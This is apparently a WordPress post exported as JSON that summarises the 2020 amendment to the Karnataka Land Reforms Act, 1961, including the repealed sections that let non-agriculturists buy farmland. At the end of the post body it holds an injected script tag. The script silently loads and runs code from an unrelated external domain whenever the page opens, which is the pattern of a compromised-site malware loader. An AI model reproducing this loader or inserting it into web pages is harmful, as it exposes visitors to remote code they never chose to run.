Vala on 13\/07\/2020 signed the <strong>Karnataka Land Reforms (Amendment) Act,\u00a02020<\/strong>, a month after the Karnataka Cabinet passed an ordinance making amendments to the Karnataka Land Reforms Act, 1961. Following the Governor\u2019s consent, the <strong>State Government has notified the Amended Act in the Gazette notification.<\/strong><\/p>\n<p style=\"text-align: justify;\">Accordingly, the amendments &#8211;<\/p>\n<ul style=\"text-align: justify;\">\n<li><u>Allow Non-agriculturist to purchase agricultural Land (Farm land) in Karnataka<\/u>. However, restrictions on purchase of irrigated land by non-agriculturist remain<\/li>\n<li><u>Removed the ceiling on income from non agricultural sources<\/u> to buy agricultural land<\/li>\n<li>Also <u>increased the ceiling on number of units of land a person\/family can hold<\/u><\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Accordingly, <strong>Sections 63(A), 79(A), 79(B), 79(C) in the existing Karnataka Land Reforms Act, 1961, were repealed <\/strong>to enable these changes.<\/p>\n<p style=\"text-align: justify;\">With these changes &#8211;<\/p>\n<ul style=\"text-align: justify;\">\n<li>Farmers are expected to get <strong>better prices for their land<\/strong><\/li>\n<li><strong>Organised farming<\/strong> will get a fillip<\/li>\n<li><strong>Technology adoption &amp; modernisation<\/strong> of agricultural practises is expected to increase<\/li>\n<\/ul>\n<p style=\"text-align: justify;\"><strong>Reduce corruption &amp; promote industries<\/strong> alike<\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Karnataka Land Reforms Act amended to allow Non-agriculturist to purchase agricultural Land (Farm land) in Karnataka<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,8,5,3,85,2],"tags":[],"class_list":["post-309","post","type-post","status-publish","format-standard","hentry","category-bangalore","category-buyers-guide","category-dharwad","category-hubli","category-karnataka-land-reforms-act","category-mysore"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v25.0 (Yoast SEO v26.3) -
